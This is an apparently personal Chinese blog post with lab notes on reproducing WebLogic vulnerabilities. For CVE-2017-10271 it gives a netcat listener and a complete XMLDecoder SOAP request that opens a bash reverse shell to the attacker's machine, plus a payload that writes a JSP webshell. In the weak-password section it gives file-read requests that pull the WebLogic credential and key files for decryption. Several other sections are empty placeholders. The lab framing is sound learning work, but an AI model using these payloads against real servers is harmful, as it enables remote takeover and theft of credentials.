weblogic

最新推荐文章于 2024-03-29 16:30:54 发布
最新推荐文章于 2024-03-29 16:30:54 发布
阅读量225 收藏
点赞数
分类专栏: web中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/110404675
版权

1.Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令

1.kali用nc监听

nc -l -p 222

2.发送数据包反弹shell,shell要进行编码

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.0.104:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.0.109/222 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

 

3.上传webshell

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>

 

 

2.Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-2628)

Oracle 2018年4月补丁中,修复了WebLogic Server WLS核心组件中出现的一个反序列化漏洞(CVE-2018-2628),该中断通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

没看懂,需要会java,学完了java再来复现

 

3.Weblogic任意文件上传漏洞(CVE-2018-2894)

 

 

 

4.Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

3.4镜像拉取失败,下次再试

 

 

 

 

 

 

 

 

 

 

 

 

 

5.弱密码

测试环境:

本环境模拟了一个真实的weblogic环境,其后台存在一个弱密码,并且前台存在的任何文件读取。

Weblogic版本:10.3.6(11g)

Java版本:1.6

 

1.利用任意文件读取漏洞读取后台用户密文和密钥文件

weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,称为SerializedSystemIni.datconfig.xml

GET /hello/file.jsp?path=./security/SerializedSystemIni.dat

 

GET /hello/file.jsp?path=./config/config.xml

 

2.使用decrypt目录下的weblogic_decrypt.jar进行解密

 

3.后台上传shell

 

 

 

 

 

 

kongytr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic10.3图像化的安装和配置
小菜鸟的天地
06-25 9675
1.系统环境 1.1 软件版本 下表为系统环境安装所需要的软件版本信息: 软件类别 版本 下载地址 OS Red Hat Enterprise Linux AS release 4 (Nahant Update 4) www.redhat.com WLS Weblogic10.3 server1033_linux32.bin
vulhub靶场-weblogic漏洞复现
m0_62008601的博客
07-18 1770
vulhub-weblogic漏洞复现集 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-10271
weblogic10.X AES加解密
06-27
weblogic10.X AES加解密 jdbc加解密 boot.properties加解密 WLEncrypt:=========================== encrypt result:{AES}f5GuX7x1nWKVrz2yTneeiKBRMDkE1Z08Ud/rcZYozwE= decrypt result:weblogic WLEncrypt:===========================
weblogic weak password复现
飞鱼的企鹅的博客
07-27 1721
环境 基于vulhub的weblogic弱口令漏洞和任意文件读取漏洞 弱口令 本环境存在弱口令 用户名:weblogic 密码:Oracle@123 weblogic常见的弱口令组合 1. Oracle - WebLogic Method HTTP User ID system Password password Level Administrator Doc Notes Login loc...
Weblogic10.3.6补丁升级
最新发布
weixin_53150440的博客
03-29 1647
Weblogic10.3.6补丁升级
weblogic部署
12-26
weblogic部署
weblogic.jar
06-22
WebLogic是Oracle公司的一款企业级应用服务器,它提供了一个用于构建、部署和管理分布式应用程序的平台。在Java EE(现在称为Jakarta EE)环境中,WebLogic Server扮演着至关重要的角色,支持各种服务如EJB...
Weblogic10.3.6补丁2021.04.zip
08-05
WebLogic Server是Oracle公司的一款企业级Java应用服务器,它提供了用于构建、部署和管理企业级Java应用程序的平台。本文将详细介绍WebLogic Server 10.3.6版本的补丁更新,以及如何进行有效的补丁安装,以确保系统...
WebLogic 12.2.1.4.0 2022年4月关键补丁
04-21
WebLogic Server是Oracle公司的一款企业级Java应用服务器,它提供了用于构建、部署和管理企业级Java应用程序的全面平台。在2022年4月发布的WebLogic 12.2.1.4.0的关键补丁,是Oracle针对该版本进行的安全性和稳定性...
weblogic最新补丁包(2021年7月)
08-08
WebLogic Server是由Oracle公司提供的一个基于Java EE的中间件平台,用于构建、部署和管理企业级应用程序。2021年7月发布的WebLogic最新补丁包是针对WebLogic Server 12.2.1.3版本的重要更新,旨在解决安全漏洞和...
WebLogic_EXP.jar WebLogic反序列化利用工具
10-31
WebLogic_EXP.jar WebLogic反序列化利用工具下载,作者rebyond。 使用环境 JDK1.8
weblogic10.3.3之后版本升级至weblogic10.3.6文档.docx
04-21
weblogic10.3.3之后升级到weblogic10.3.6详细操作文档,可以安装文档说明进行操作对weblogic低版本进行升级操作。
weblogic密码加解密 - rznice的专栏 - CSDN博客1
08-03
1. 密钥K1进DES加密 2. K2对步骤1的结果进DES解密 3. 步骤2的结果使密钥K1进DES加密
Linux环境下weblogic10.3.6(jar)版本集群安装详解
薛定谔的猫_博客
09-18 2213
应各位小伙伴们要求,最近有在搭建weblogic的环境内容,特此整理一份关于weblogic搭建的内容,供童鞋们参考使用!! 《一》环境记录 服务器操作系统版本 cos7 weblogic版本包 weblogic1036_generic.jar(weblogic11g) JDK jdk1.6.0 安装方式 静默安装 安装用户 root 注意:在实际生产环境中,切记要使用weblogic用户组进行安装,这里我懒了就没有创建相应用户组进行安 《二》上传所有安装包到制定路径 《三》
Weblogic 常规渗透测试环境(文件读取漏洞)
EC_Carrot的博客
08-21 709
简介 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 Weblogic版本:10.3.6(11g) Java版本:1.6 弱口令: weblogic Oracle@123 复现操作 接下来我们假设不知道弱口令,那我们怎么靠文件读取来getshell呢? 本环境前台模拟了一个任意文件下载漏洞,访问http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成
生产环境weblogic 10.3.6安装部署
你说亮不亮的博客
04-09 2980
一、环境准备 1、创建weblogiic用户组: groupadd weblogic useradd -d /app/ -g weblogic weblogic passwd weblogic 2、修改open file参数,方法如下: vim /etc/security/limits.conf weblogic soft nofile 65536 weblogic hard nofile 6...
Linux下WebLogic10.3的安装与配置
shihuan830619的专栏
10-10 338
WebLogic 10.3 安装、配置与管理手册 第二章 WebLogic 10.3 for SUSE linux §2.1 安装准备  下载WebLogic10.3 for x86 linux安装文件;  安装Suse Linux enterprise Server 11.0;  检查Suse环境,确保/root空闲空间在2G以上。如果/root空间不足,则应扩展root空间,或...
Weblogic配置SSL全过程
西伯利亚疯狂的蚯蚓
03-24 3776
1 基本原理 1.1 SSL简介 SSL 代表安全套接字层,主要用于两个目的: 验证网站的身份以及(可选)客户身份 在程序之间建立安全的加密连接 SSL 协议为通过网络连接的应用程序提供安全性。 具体来说,SSL 协议提供以下内容: 应用程序交换的数据的加密 应用程序可以用来验证彼此身份的机制 数据完整性,从而保护在客户端和服务器之间流动的数据免受第三方篡改 当使用 SSL 协议时,目标总是向发起者验证自己。可选地,如果目标请求它,发起者可以向目标验证自己。加密使通过网络传输的数据只能被预期的接收
Weblogic10.3集群配置指南
"Weblogic10.3集群配置手册" 在WebLogic Server中,集群是一种能够提高可用性和可伸缩性的技术。集群允许你将多个服务器实例组合在一起,以作为一个单一的逻辑单元工作,从而实现故障转移、负载均衡和资源共享。本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值